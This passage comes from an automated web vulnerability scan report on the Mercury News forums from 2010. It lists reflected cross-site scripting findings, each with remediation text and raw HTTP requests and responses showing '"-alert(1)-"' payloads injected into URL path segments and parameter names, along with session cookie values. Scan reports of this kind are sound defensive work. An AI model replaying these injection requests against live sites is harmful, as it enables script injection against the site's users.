Last-Modified: Mon, 15 Nov 2010 02:06:06 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 19326

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title
...[SNIP]...
anguage="JavaScript">
if (typeof s != 'undefined') {
   s.pageName="";
   s.channel="Forums";
   s.prop1="Home";
   s.prop2=s.prop1 + " / Opinion";
   s.prop3=s.prop2 + " / Forums";
   s.prop4=s.prop3 + " / poll?617c4"-alert(1)-"5f42983c31b=1";
   s.prop9=getCiQueryString("SOURCE");
   s.campaign=getCiQueryString("EADID")+getCiQueryString("CREF");
   s.events="event1";
   s.eVar2=getCiQueryString("SOURCE");
   s.eVar4=s.pageName;
   s.campaign=getCi
...[SNIP]...

3.83. http://forums.mercurynews.com/poll/are-medical-marijuana-clubs-a-huge-problem-in-santa-clara-county [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://forums.mercurynews.com
Path:   /poll/are-medical-marijuana-clubs-a-huge-problem-in-santa-clara-county

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 266bd"-alert(1)-"bf4e6a9d30d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /poll266bd"-alert(1)-"bf4e6a9d30d/are-medical-marijuana-clubs-a-huge-problem-in-santa-clara-county HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 02:05:59 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:06:23 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22216

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title
...[SNIP]...
language="JavaScript">
if (typeof s != 'undefined') {
   s.pageName="";
   s.channel="Forums";
   s.prop1="Home";
   s.prop2=s.prop1 + " / Opinion";
   s.prop3=s.prop2 + " / Forums";
   s.prop4=s.prop3 + " / poll266bd"-alert(1)-"bf4e6a9d30d/are-medical-marijuana-clubs-a-huge-problem-in-santa-clara-county";
   s.prop9=getCiQueryString("SOURCE");
   s.campaign=getCiQueryString("EADID")+getCiQueryString("CREF");
   s.events="event1";
   s.eVar2=get
...[SNIP]...

3.84. http://forums.mercurynews.com/poll/are-medical-marijuana-clubs-a-huge-problem-in-santa-clara-county [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://forums.mercurynews.com
Path:   /poll/are-medical-marijuana-clubs-a-huge-problem-in-santa-clara-county

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2f844"-alert(1)-"3df5df2d371 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /poll/are-medical-marijuana-clubs-a-huge-problem-in-santa-clara-county2f844"-alert(1)-"3df5df2d371 HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 02:06:03 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:06:27 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 20220

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title
...[SNIP]...
="";
   s.channel="Forums";
   s.prop1="Home";
   s.prop2=s.prop1 + " / Opinion";
   s.prop3=s.prop2 + " / Forums";
   s.prop4=s.prop3 + " / poll/are-medical-marijuana-clubs-a-huge-problem-in-santa-clara-county2f844"-alert(1)-"3df5df2d371";
   s.prop9=getCiQueryString("SOURCE");
   s.campaign=getCiQueryString("EADID")+getCiQueryString("CREF");
   s.events="event1";
   s.eVar2=getCiQueryString("SOURCE");
   s.eVar4=s.pageName;
   s.campaign=getCiQu
...[SNIP]...

3.85. http://forums.mercurynews.com/poll/are-medical-marijuana-clubs-a-huge-problem-in-santa-clara-county [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://forums.mercurynews.com
Path:   /poll/are-medical-marijuana-clubs-a-huge-problem-in-santa-clara-county

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b1bf3"-alert(1)-"01dc7af58ce was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /poll/are-medical-marijuana-clubs-a-huge-problem-in-santa-clara-county?b1bf3"-alert(1)-"01dc7af58ce=1 HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 02:05:54 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:06:18 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 28628

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title
...[SNIP]...
"";
   s.channel="Forums";
   s.prop1="Home";
   s.prop2=s.prop1 + " / Opinion";
   s.prop3=s.prop2 + " / Forums";
   s.prop4=s.prop3 + " / poll/are-medical-marijuana-clubs-a-huge-problem-in-santa-clara-county?b1bf3"-alert(1)-"01dc7af58ce=1";
   s.prop9=getCiQueryString("SOURCE");
   s.campaign=getCiQueryString("EADID")+getCiQueryString("CREF");
   s.events="event1";
   s.eVar2=getCiQueryString("SOURCE");
   s.eVar4=s.pageName;
   s.campaign=getCi
...[SNIP]...

3.86. http://forums.mercurynews.com/syndication/jsonXmlToHtml.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://forums.mercurynews.com
Path:   /syndication/jsonXmlToHtml.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 72dff"-alert(1)-"3eb0ed22cc2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /syndication72dff"-alert(1)-"3eb0ed22cc2/jsonXmlToHtml.js HTTP/1.1
Accept: */*
Referer: http://www.mercurynews.com/business
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: forums.mercurynews.com
Proxy-Connection: Keep-Alive
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 01:43:42 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Set-Cookie: SESS7d37fc218a44afb27b49a326af87a923=4fddb2720eb8ae7d58407c4126fd5a38; expires=Wed, 08 Dec 2010 05:17:02 GMT; path=/; domain=.forums.mercurynews.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 01:44:06 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 22109

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title
...[SNIP]...
e="JavaScript">
if (typeof s != 'undefined') {
   s.pageName="";
   s.channel="Forums";
   s.prop1="Home";
   s.prop2=s.prop1 + " / Opinion";
   s.prop3=s.prop2 + " / Forums";
   s.prop4=s.prop3 + " / syndication72dff"-alert(1)-"3eb0ed22cc2/jsonXmlToHtml.js";
   s.prop9=getCiQueryString("SOURCE");
   s.campaign=getCiQueryString("EADID")+getCiQueryString("CREF");
   s.events="event1";
   s.eVar2=getCiQueryString("SOURCE");
   s.eVar4=s.pageName;
   s
...[SNIP]...

3.87. http://forums.mercurynews.com/syndication/jsonXmlToHtml.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://forums.mercurynews.com
Path:   /syndication/jsonXmlToHtml.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e61ea"-alert(1)-"f6fde09b897 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /syndication/jsonXmlToHtml.jse61ea"-alert(1)-"f6fde09b897 HTTP/1.1
Accept: */*
Referer: http://www.mercurynews.com/business
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: forums.mercurynews.com
Proxy-Connection: Keep-Alive
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 01:49:50 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Set-Cookie: SESS7d37fc218a44afb27b49a326af87a923=3815c27cd4b31bf68aabb6e890edd039; expires=Wed, 08 Dec 2010 05:23:10 GMT; path=/; domain=.forums.mercurynews.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 01:50:14 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 22134

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title
...[SNIP]...
f (typeof s != 'undefined') {
   s.pageName="";
   s.channel="Forums";
   s.prop1="Home";
   s.prop2=s.prop1 + " / Opinion";
   s.prop3=s.prop2 + " / Forums";
   s.prop4=s.prop3 + " / syndication/jsonXmlToHtml.jse61ea"-alert(1)-"f6fde09b897";
   s.prop9=getCiQueryString("SOURCE");
   s.campaign=getCiQueryString("EADID")+getCiQueryString("CREF");
   s.events="event1";
   s.eVar2=getCiQueryString("SOURCE");
   s.eVar4=s.pageName;
   s.campaign=getCiQu
...[SNIP]...

3.88. http://forums.mercurynews.com/topic/40th-annivesary-celebration-post-your-memorable-moments-at-childrens-musical-theatre-san-jose [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://forums.mercurynews.com
Path:   /topic/40th-annivesary-celebration-post-your-memorable-moments-at-childrens-musical-theatre-san-jose

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ab22e"-alert(1)-"d193185f86e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /topicab22e"-alert(1)-"d193185f86e/40th-annivesary-celebration-post-your-memorable-moments-at-childrens-musical-theatre-san-jose HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 02:07:08 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:07:32 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22276

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title
...[SNIP]...
anguage="JavaScript">
if (typeof s != 'undefined') {
   s.pageName="";
   s.channel="Forums";
   s.prop1="Home";
   s.prop2=s.prop1 + " / Opinion";
   s.prop3=s.prop2 + " / Forums";
   s.prop4=s.prop3 + " / topicab22e"-alert(1)-"d193185f86e/40th-annivesary-celebration-post-your-memorable-moments-at-childrens-musical-theatre-san-jose";
   s.prop9=getCiQueryString("SOURCE");
   s.campaign=getCiQueryString("EADID")+getCiQueryString("CREF");
   s.
...[SNIP]...

3.89. http://forums.mercurynews.com/topic/40th-annivesary-celebration-post-your-memorable-moments-at-childrens-musical-theatre-san-jose [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://forums.mercurynews.com
Path:   /topic/40th-annivesary-celebration-post-your-memorable-moments-at-childrens-musical-theatre-san-jose

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5f6eb"-alert(1)-"db61396b3da was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /topic/40th-annivesary-celebration-post-your-memorable-moments-at-childrens-musical-theatre-san-jose5f6eb"-alert(1)-"db61396b3da HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 02:07:22 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:07:46 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22276

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title
...[SNIP]...
rop1="Home";
   s.prop2=s.prop1 + " / Opinion";
   s.prop3=s.prop2 + " / Forums";
   s.prop4=s.prop3 + " / topic/40th-annivesary-celebration-post-your-memorable-moments-at-childrens-musical-theatre-san-jose5f6eb"-alert(1)-"db61396b3da";
   s.prop9=getCiQueryString("SOURCE");
   s.campaign=getCiQueryString("EADID")+getCiQueryString("CREF");
   s.events="event1";
   s.eVar2=getCiQueryString("SOURCE");
   s.eVar4=s.pageName;
   s.campaign=getCiQu
...[SNIP]...

3.90. http://forums.mercurynews.com/topic/40th-annivesary-celebration-post-your-memorable-moments-at-childrens-musical-theatre-san-jose [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://forums.mercurynews.com
Path:   /topic/40th-annivesary-celebration-post-your-memorable-moments-at-childrens-musical-theatre-san-jose

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d0fec"-alert(1)-"b2737086bf5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /topic/40th-annivesary-celebration-post-your-memorable-moments-at-childrens-musical-theatre-san-jose?d0fec"-alert(1)-"b2737086bf5=1 HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 02:06:50 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:07:14 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22243

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title
...[SNIP]...
op1="Home";
   s.prop2=s.prop1 + " / Opinion";
   s.prop3=s.prop2 + " / Forums";
   s.prop4=s.prop3 + " / topic/40th-annivesary-celebration-post-your-memorable-moments-at-childrens-musical-theatre-san-jose?d0fec"-alert(1)-"b2737086bf5=1";
   s.prop9=getCiQueryString("SOURCE");
   s.campaign=getCiQueryString("EADID")+getCiQueryString("CREF");
   s.events="event1";
   s.eVar2=getCiQueryString("SOURCE");
   s.eVar4=s.pageName;
   s.campaign=getCi
...[SNIP]...

3.91. http://forums.mercurynews.com/topic/645-sri-lanka-and-thailand-9-1-2010 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://forums.mercurynews.com
Path:   /topic/645-sri-lanka-and-thailand-9-1-2010

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e42c8"-alert(1)-"227f159106e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /topice42c8"-alert(1)-"227f159106e/645-sri-lanka-and-thailand-9-1-2010 HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 02:07:18 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:07:42 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22160

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title
...[SNIP]...
anguage="JavaScript">
if (typeof s != 'undefined') {
   s.pageName="";
   s.channel="Forums";
   s.prop1="Home";
   s.prop2=s.prop1 + " / Opinion";
   s.prop3=s.prop2 + " / Forums";
   s.prop4=s.prop3 + " / topice42c8"-alert(1)-"227f159106e/645-sri-lanka-and-thailand-9-1-2010";
   s.prop9=getCiQueryString("SOURCE");
   s.campaign=getCiQueryString("EADID")+getCiQueryString("CREF");
   s.events="event1";
   s.eVar2=getCiQueryString("SOURCE");
   s.e
...[SNIP]...

3.92. http://forums.mercurynews.com/topic/645-sri-lanka-and-thailand-9-1-2010 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://forums.mercurynews.com
Path:   /topic/645-sri-lanka-and-thailand-9-1-2010

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 51c06"-alert(1)-"12bdca9849b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /topic/645-sri-lanka-and-thailand-9-1-201051c06"-alert(1)-"12bdca9849b HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 02:07:28 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:07:52 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22160

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title
...[SNIP]...
= 'undefined') {
   s.pageName="";
   s.channel="Forums";
   s.prop1="Home";
   s.prop2=s.prop1 + " / Opinion";
   s.prop3=s.prop2 + " / Forums";
   s.prop4=s.prop3 + " / topic/645-sri-lanka-and-thailand-9-1-201051c06"-alert(1)-"12bdca9849b";
   s.prop9=getCiQueryString("SOURCE");
   s.campaign=getCiQueryString("EADID")+getCiQueryString("CREF");
   s.events="event1";
   s.eVar2=getCiQueryString("SOURCE");
   s.eVar4=s.pageName;
   s.campaign=getCiQu
...[SNIP]...

3.93. http://forums.mercurynews.com/topic/645-sri-lanka-and-thailand-9-1-2010 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://forums.mercurynews.com
Path:   /topic/645-sri-lanka-and-thailand-9-1-2010

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9b712"-alert(1)-"c150a5b4989 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /topic/645-sri-lanka-and-thailand-9-1-2010?9b712"-alert(1)-"c150a5b4989=1 HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 02:07:06 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:07:30 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 46103

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title
...[SNIP]...
'undefined') {
   s.pageName="";
   s.channel="Forums";
   s.prop1="Home";
   s.prop2=s.prop1 + " / Opinion";
   s.prop3=s.prop2 + " / Forums";
